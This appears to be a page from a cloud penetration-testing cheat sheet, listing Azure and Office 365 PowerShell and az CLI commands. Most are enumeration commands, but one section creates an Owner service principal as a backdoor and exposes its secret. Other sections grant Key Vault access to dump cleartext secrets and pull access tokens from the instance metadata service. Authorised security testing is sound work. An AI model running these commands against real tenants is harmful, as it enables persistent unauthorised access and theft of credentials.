Cloud Pen-testing Part-2

## Microsoft Azure & O365 CLI Tool Cheatsheet (Part - 2)

### Virtual Machines

#### List VMs and get OS details

```powershell
Get-AzVM
$vm = Get-AzVM -Name "VM Name"
$vm.OSProfile

Run commands on VMs

Invoke-AzVMRunCommand -ResourceGroupName $ResourceGroupName -VMName $VMName -CommandId RunPowerShellScript -ScriptPath ./powershell-script.ps1

Networking

List virtual networks

Get-AzVirtualNetwork

List public IP addresses assigned to virtual NICs

Get-AzPublicIpAddress

Get Azure ExpressRoute (VPN) Info

Get-AzExpressRouteCircuit

Get Azure VPN Info

Get-AzVpnConnection

Backdoors

Create a new Azure service principal as a backdoor

$spn = New-AzAdServicePrincipal -DisplayName "WebService" -Role Owner
$spn
$BSTR = ::SecureStringToBSTR($spn.Secret)
$UnsecureSecret = ::PtrToStringAuto($BSTR)
$UnsecureSecret
$sp = Get-MsolServicePrincipal -AppPrincipalId <AppID>
$role = Get-MsolRole -RoleName "Company Administrator"
Add-MsolRoleMember -RoleObjectId $role.ObjectId -RoleMemberType ServicePrincipal -RoleMemberObjectId $sp.ObjectId
# Enter the AppID as username and what was returned for $UnsecureSecret as the password in the Get-Credential prompt
$cred = Get-Credential
Connect-AzAccount -Credential $cred -Tenant "tenant ID" -ServicePrincipal

MSOnline PowerShell Module

Authentication

Connect-MsolService

Account and Directory Information

List Company Information

Get-MSolCompanyInformation

List all users

Get-MSolUser -All

List all groups

Get-MSolGroup -All

List members of a group (Global Admins in this case)

Get-MsolRole -RoleName "Company Administrator"
Get-MsolGroupMember -GroupObjectId $GUID

List all user attributes

Get-MSolUser -All | fl

List Service Principals

Get-MsolServicePrincipal

Az CLI Tool

Authentication

az login

Dump Azure Key Vaults

List out any key vault resources the current account can view

az keyvault list --query '[].name' --output tsv

With contributor level access, you can give yourself the right permissions to obtain secrets.

az keyvault set-policy --name <KeyVaultname> --upn <YourContributorUsername> --secret-permissions get list --key-permissions get list --storage-permissions get list --certificate-permissions get list

Get URI for Key Vault

az keyvault secret list --vault-name <KeyVaultName> --query '[].id' --output tsv

Get cleartext secret from key vault

az keyvault secret show --id <URI from the last command> | ConvertFrom-Json

Metadata Service URL

http://169.254.169.254/metadata

Get access tokens from the metadata service

GET 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' HTTP/1.1 Metadata: true

Other Azure & O365 Tools

MicroBurst

Azure security assessment tool

https://github.com/NetSPI/MicroBurst

PreviousCloud Pen-testing Part-1 NextCloud Pen-testing Part -3

Last updated 2 years ago

hashtagNetworking

hashtagBackdoors

hashtagMSOnline PowerShell Module

hashtagAz CLI Tool

hashtagMetadata Service URL

hashtagOther Azure & O365 Tools